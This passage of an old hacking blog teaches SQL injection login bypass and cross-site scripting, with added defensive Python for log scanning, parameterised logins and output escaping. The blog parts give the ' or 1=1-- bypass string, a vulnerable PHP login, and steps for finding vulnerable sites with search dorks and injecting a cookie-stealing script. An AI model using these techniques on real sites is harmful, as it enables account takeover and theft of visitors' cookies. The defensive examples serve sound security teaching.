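    """Per-client tally of indicator tags; a high blind_probe count in a short
    window is the signature of the character-by-character guessing described above."""
    per_ip: dict[str, Counter] = defaultdict(Counter)
    for f in findings:
        per_ip[f["ip"]].update(f["tags"])
    return dict(per_ip)


if __name__ == "__main__":
    for ip, tags in summarize(scan_access_log(SAMPLE_LOG)).items():
        print(ip, dict(tags))
```

The rules are deliberately narrow so that ordinary search terms do not match; in a real deployment the per-client counts would be fed into an alert threshold rather than read by hand. On the database side, whether load_file() and INTO OUTFILE work at all is controlled by the FILE privilege the post mentions and by MySQL's secure_file_priv setting, so the application's database account should simply not hold FILE.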


0x10 - Login Bypass
Ok, I left this towards the end because it is not really very common anymore, but I will throw it in because I suppose you may run across it some day (I have only run across this vulnerability once in the real world). The concept behind the SQL login bypass is quite simple: in order to execute the exploit you input a username into the user field, then in the password field of the form you put:

' or 1=1--


this just ends the current password value and appends a logical OR with a statement that is always true. A simple MySQL login script could look like:

 <?php
 $user = $_POST['user'];
 $pass = $_POST['pass'];
 $ref = $_SERVER['HTTP_REFERER'];
 if((!$user) or (!$pass)) {
 header("Location:$ref");
 exit();
 }
 $conn = @mysql_connect("localhost", "root", "blah") or die("Could not connect");
 $rs = @mysql_select_db("db", $conn) or die("db error");
 // user input is pasted straight into the query text
 $sql = "SELECT * FROM users WHERE user=\"$user\" AND pass=\"$pass\"";
 $rs = mysql_query($sql, $conn) or die("query error");
 // login succeeds as soon as any row comes back
 $num = mysql_num_rows($rs);
 if($num != 0) {
 echo("Welcome $user");
 } else {
 header("Location:$ref");
 exit();
 }
 ?>

so if we input the user "admin" and, as the password, a double quote followed by or 1=1-- (this script wraps values in double quotes, so the double quote form of the payload is used here), the query sent to the server is going to look like this:

"SELECT * FROM users WHERE user="admin" AND pass="" or 1=1--"


so the server is going to select the rows where "user" equals "admin" and disregard whether "pass" is correct, because it is asking whether the pass matches OR 1=1 is true; since 1=1 is always true, you bypass the password check.
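To show both why the bypass works and what the fix looks like, here is an added example (not from the post) that rebuilds the login above in Python against an in-memory SQLite table with constructed accounts. login_vulnerable() keeps the exact shape of the PHP script: input pasted into the SQL text and success decided by "did any row come back". login_safe() sends the username as a bound parameter and checks the password in code against a salted PBKDF2 hash, so neither quotes nor the -- comment marker have any meaning. The plaintext pass column exists only so the vulnerable path can mirror the post.

```python
import hashlib
import hmac
import os
import sqlite3


def _hash(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 so the stored value is not the password itself."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed accounts. The plaintext 'pass'
    column exists only so login_vulnerable() can mirror the post's PHP script;
    a real schema keeps only salt and pass_hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user TEXT PRIMARY KEY, pass TEXT, salt BLOB, pass_hash BLOB)"
    )
    for user, pw in (("admin", "correct horse"), ("bob", "hunter2")):
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                     (user, pw, salt, _hash(pw, salt)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str):
    """Same logic as the post's script: string-built SQL, success if any row
    comes back. Returns the matched user name or None."""
    sql = f"SELECT user FROM users WHERE user='{user}' AND pass='{password}'"
    rows = conn.execute(sql).fetchall()
    # With pass='' or 1=1--' the WHERE clause is true for every row, so rows
    # is never empty and the first row is treated as the logged-in user.
    return rows[0][0] if rows else None


def login_safe(conn: sqlite3.Connection, user: str, password: str):
    """Parameterised lookup: the driver sends the username as data, never as
    SQL text. The password never reaches the database at all; it is checked in
    code against the stored hash with a constant-time comparison."""
    row = conn.execute("SELECT salt, pass_hash FROM users WHERE user = ?",
                       (user,)).fetchone()
    if row is None:
        _hash(password, b"\x00" * 16)  # spend the same time for unknown users
        return None
    salt, stored = row
    return user if hmac.compare_digest(_hash(password, salt), stored) else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"  # the post's bypass string, single-quote form
    print("vulnerable:", login_vulnerable(db, "admin", payload))
    print("safe:      ", login_safe(db, "admin", payload))
```

The two changes are independent: parameterised queries stop the injection, and checking a hash in code (rather than comparing the password inside SQL) means that even a future injection elsewhere cannot turn the login into an "any row wins" check.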


0x11 - Useful Keywords/Functions
UNION, ALL, SELECT, AND/OR, ORDER BY, WHERE, LIMIT, LIKE, INTO OUTFILE, char(), ascii(), mid(), concat(), group_concat(), load_file(), user(), database(), version()


That's all about the SQL.... Hope u like it ...
Leave a comment or suggestion...

Saturday, October 22, 2011

Complete tutorial in xss cross site scripting for beginners

What is xss???
XSS stands for Cross Site Scripting. It is one of the top web application vulnerabilities. This vulnerability allows the attacker to insert client-side scripts (especially JavaScript). Using this vulnerability an attacker can inject malicious code, which leads to malware attacks.

XSS Vulnerability and Injection:

Step 1: Finding Vulnerable Website: 
It's not a difficult job for a script kiddie. As usual, an attacker will search Google using a Google dork. For example, he will search for "search?q=". This will return plenty of websites.

Step 2: Testing the Vulnerability:
In order to test the vulnerability, we need to find a POST or GET parameter. Confused? These are just input fields that will be sent to the server, for example a search query, username, or password.
There are two ways to test the vulnerability:


Method 1: Injection in form box(especially search box)
An attacker can enter the malicious script inside the search box and click the search button. This will cause the malicious script to run inside that website.



Method 2: Injecting in url
In this method there may not be any form box; the URL field is used instead.
For Example:
http://vulnerablewebsite/search?q=malicious_script_goes_here

Using method 1, you can enter the code in the search box and click the search button,
or,
using method 2, you can enter the code in the URL like this:

http://vulnerablewebsite/search?q=

if it shows a "You are hacked by bikash" message in a popup box, then it is vulnerable to XSS.
Step 3: Injecting Malicious Scripts
After finding a vulnerable site, an attacker will inject malicious scripts. This may lead to cookie stealing and malware attacks, as said before.

Let us assume an attacker has a cookie stealing script on his website; for instance, his malicious script URL is
http://TargetSite/malicious.js
He can now inject the malicious script inside the vulnerable site like this:

http://TargetSite/malicious.js>
When visitors load the website, the malicious script starts to run and steals their cookies.

Types of XSS Based on persisting capability:

There are two types of XSS based on persisting Capability namely Persistent and Non-Persistent.

Persistent XSS:
This is the riskier XSS vulnerability: the data provided is stored on the server, so the malicious script injection is permanently stored in the web application and will be shown to other users when they visit the site.
If the attacker injects malware, then regular users of that website are also infected.

For example:
Some sites may store the search query in order to track user interest. This results in permanent storage of the XSS payload.

Non-Persistent XSS:
Also referred to as Reflected XSS. In this case the storage of the malicious script is temporary (meaning it won't be shown to other users). The attacker may trick users into visiting the URL with the injection; as they are regular users of that site, they will trust the link. This leads to cookie stealing.

For example:
When you search on some site, it returns the result page with your search string in it. This causes the malicious code to run temporarily.
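Both variants have the same root cause and the same fix: the search string is written into the page without being escaped for the context it lands in. The following Python is an added example, not from the post, that renders the search-results page the reflected case describes in its vulnerable and hardened forms, keeps a constructed in-memory search history for the persistent case, and uses the standard-library HTML parser to check whether rendered output contains a script element or an on* event handler. The page layout, the SEARCH_HISTORY store and the probe string are all assumptions made for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed stand-in for a server-side store of past search queries, the
# "persistent" situation described above
SEARCH_HISTORY: list[str] = []


def render_search_vulnerable(query: str) -> str:
    """Reflected XSS: the raw q parameter is pasted into the page as markup."""
    return f"<h1>Results for {query}</h1>"


def render_search_safe(query: str) -> str:
    """Escape at output time, once per context: HTML text gets html.escape;
    the query inside the permalink URL is percent-encoded first and then
    HTML-escaped because it sits inside an attribute value."""
    text = html.escape(query, quote=True)
    href = html.escape("/search?q=" + quote(query, safe=""), quote=True)
    return f'<h1>Results for {text}</h1><a href="{href}">permalink</a>'


def store_search(query: str) -> None:
    """Storing the raw string is fine; the bug is rendering it unescaped later."""
    SEARCH_HISTORY.append(query)


def render_history_safe() -> str:
    """Persistent case: the stored strings go through the same escaping."""
    items = "".join(f"<li>{html.escape(q, quote=True)}</li>" for q in SEARCH_HISTORY)
    return f"<ul>{items}</ul>"


class ActiveContentDetector(HTMLParser):
    """Tokenises rendered HTML the way a browser would and records script
    elements and on* event handler attributes. A check, not a sanitiser."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script element")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.hits.append(f"{tag} {name} handler")


def has_active_content(document: str) -> bool:
    """True if the rendered document would execute script when loaded."""
    d = ActiveContentDetector()
    d.feed(document)
    d.close()
    return bool(d.hits)


if __name__ == "__main__":
    probe = "<script>alert('test')</script>"  # constructed test input
    print("vulnerable page runs script:", has_active_content(render_search_vulnerable(probe)))
    print("escaped page runs script:   ", has_active_content(render_search_safe(probe)))
```

The detector is useful as a regression test for templates, not as a filter on input: input filtering is what the popup test in this post defeats, whereas escaping every value at output time, in the encoding of the context it lands in, closes both the reflected and the stored variant at once.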
What can an attacker do with this Vulnerability?
  • Stealing identity and confidential data (credit card details).
  • Bypassing restriction in websites.
  • Malware Attack
  • Denial of Service attacks (DoS)

any doubts please comment and share....